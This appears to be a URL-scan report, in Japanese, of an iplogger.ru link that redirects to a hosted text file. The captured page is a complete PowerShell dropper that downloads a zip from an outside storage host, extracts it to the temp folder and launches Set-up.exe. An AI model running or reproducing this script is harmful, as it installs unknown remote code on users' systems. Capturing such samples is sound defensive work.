https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/Lejr90.txt

送信済みURL:
https://iplogger.ru/250925リダイレクト済み
レポート終了日:

リンク · 0件検出

JavaScript変数 · 3件検出

コンソールログメッセージ · 1件検出

HTML

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">$webClient = New-Object System.Net.WebClient
$url1 = "https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/jopi23.zip"
$zipPath1 = "$env:TEMP\pg1.zip"
$webClient.DownloadFile($url1, $zipPath1)
$extractPath1 = "$env:TEMP\file"
Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1
Start-Process -FilePath $env:TEMP\file\Set-up.exe
</pre></body></html>